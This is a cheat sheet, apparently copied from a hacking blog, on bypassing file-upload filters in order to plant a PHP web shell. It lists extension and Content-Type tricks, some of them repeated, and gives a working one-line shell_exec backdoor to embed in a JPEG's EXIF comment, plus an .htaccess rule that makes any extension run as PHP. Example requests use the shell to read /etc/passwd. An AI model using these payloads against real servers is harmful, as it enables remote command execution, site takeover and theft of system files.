Content-Type —>Change the parameter in the request header using Burp, ZAP etc.
Content-Type: application/x-php
Content-Type: image/jpeg
Put server executable extensions like file.php5, file.shtml, file.asa, file.cert
Changing letters to capital form file.aSp or file.PHp3
Using trailing spaces and/or dots at the end of the filename like file.asp… … . . .. .. , file.asp , file.asp.
Use of semicolon after the forbidden extension and before the permitted extension example: file.asp;.jpg (Only in IIS 6 or prior)
Upload a file with 2 extensions—> file.php.jpg
Use of null character—> file.asp.jpg
Create a file with a forbidden extension —> file.asp:.jpg or file.asp::$data
Combination of the above
Here is a list of bypasses:
shell.jpg.php (satisfies as check for jpg only)
shell.jpg.PhP (obfuscation)
shell.php;.jpg (sometimes can ignore whats after ";")
shell.php%0delete0.jpg (the infamous NULL byte which comments out trailing text, remove the word delete so the zeros join together, blogspot strips this string!)
shell.php.test (defaults to first recognised extension ignoring "test")
shell.php.xxxjpg (still ends in .jpg, but not recognised extension so will default to php!)
.phtml (a commonly used php parsed extension often forgotten about!)
.php3/.php4/.php5 (valid PHP extensions possibly left out of extension blacklists)
shell.jpg.php (satisfies as check for jpg only)
shell.jpg.PhP (obfuscation)
shell.php;.jpg (sometimes can ignore whats after ";")
shell.php%0delete0.jpg (the infamous NULL byte which comments out trailing text, remove the word delete so the zeros join together, blogspot strips this string!)
shell.php.test (defaults to first recognised extension ignoring "test")
shell.php.xxxjpg (still ends in .jpg, but not recognised extension so will default to php!)
.phtml (a commonly used php parsed extension often forgotten about!)
.php3/.php4/.php5 (valid PHP extensions possibly left out of extension blacklists)
Perform further checks once uploaded to make sure it is a REAL image:
$imageinfo = getimagesize($_FILES['userfile']['tmp_name']);
The function getimagesize() effectively confirms whether the uploaded file is an image or not. At this point, all the other methods will fail (there are other functions that can be used with a similar goal such as checking image dimensions). The only full-proof solution is to actually upload a real image which will actually pass these checks rather than trying to bypass them.We turn to the trusty JPG file as our example image. There is an amazing amount of information that can be stored in a jpg file along side the actualy image data. EXIF 'meta' data such as the camera model the image was taken on, image descriptions, and comments are editable with progams such as GIMP and even a hex editor. For purposes of this tutorial I use Exif Pilot. (Edit: My good pal Hooded Robin wrote a nifty exif editor and shell builder in Ruby, check it out here).
Create a small image (avatar size) in MSPaint (white background), we can use Exif Pilot to open/edit the file and edit the Exif data- inserting our PHP code into the 'comment' section. See the pic below, I am using my generic 'tiny shell' code to allow me to pass shell commands to the server on the fly.
code:
<?if($_GET['r0ng']){echo"<pre>".shell_exec($_GET["r0ng"]);}?>Now we can upload the jpg file using an extension bypass shown earlier, and it will pass the real image check.
To run commands on the server, usage would be:
website.com/shell.jpg.php?r0ng=cat /etc/passwd
4.Found an extension that will upload but its not valid php...
Upload an .htaccess file which sets an arbitrary file extension to be processed as php. If there is already an .htacess file in the image upload directory this should be automatically overwritten.Create a .htaccess file and put the following code, then upload it (replace .mp3 with whatever extension passed).
AddType application/x-httpd-php .mp3 Upload your shell as shell.mp3. Then access as: website.com/shell.mp3?r0ng=cat /etc/passwd
LFI ile birlikte file upload kullanımı
http://hackers2devnull.blogspot.com.tr/2013/10/lfi-vulnerability-image-upload-form-you.html
